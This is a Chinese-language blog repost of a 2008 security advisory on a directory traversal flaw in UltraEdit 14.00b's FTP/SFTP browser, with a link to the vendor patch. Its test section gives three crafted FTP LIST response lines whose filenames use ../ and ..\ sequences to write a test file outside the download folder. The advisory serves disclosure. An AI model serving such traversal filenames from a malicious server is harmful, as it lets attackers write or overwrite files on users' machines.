UltraEdit FTP/SFTP LIST命令目录遍历漏洞

Posted by ArtHack on Jun 23rd, 2008 and filed under Notice loopholes. You can follow any responses to this entry through the RSS 2.0. You can also subscribe to us, through the Top of the E-mail - 加入超级QQ群:32843311

受影响系统:
IDM Computer Solutions UltraEdit 14.00b
描述:
——————————————————————————–
BUGTRAQ  ID: 29784
UltraEdit是HTML、HEX文本和PHP、Perl等编程语言的多用途编辑器。
UltraEdit内置的FTP/SFTP浏览器没有正确地过滤FTP服务器响应LIST命令所返回文件名中的斜线和反斜线。如果用户受骗从服务器下载了整个目录的话,就可能导致向用户机器上的任意位置写入文件。
<*来源:Tan Chew Keong (chewkeong@security.org.sg

链接:http://secunia.com/advisories/30749/ http://vuln.sg/ultraedit1400b-en.html*>
测试方法:
——————————————————————————–
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
-rw-r–r–    1 ftp      ftp            20 Mar 01 05:37 \..\..\..\..\..\..\..\..\..\testfile.txt\r\n
-rw-r–r–    1 ftp      ftp            20 Mar 01 05:37 /../../../../../../../../../testfile.txt\r\n
-rw-r–r–    1 ftp      ftp            20 Mar 01 05:37 ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n
建议:
——————————————————————————–
厂商补丁:
IDM Computer Solutions
———————-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.ultraedit.com/products/index.html

Classic Posts

Related Posts

Our Sponsors

Leave a Reply

Our Sponsors

Recent Posts

Recent Comments

Tag Cloud

Premium Wordpress Themes

WPNOW Themes
StudioPress
WooThemes
wp remix
Template Monster
Translator
Chinese (Simplified) flagChinese (Traditional) flagItalian flagKorean flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroat flagDanish flagFinnish flagHindi flagPolish flagRumanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag
Log in / Art Hack.All rights reserved.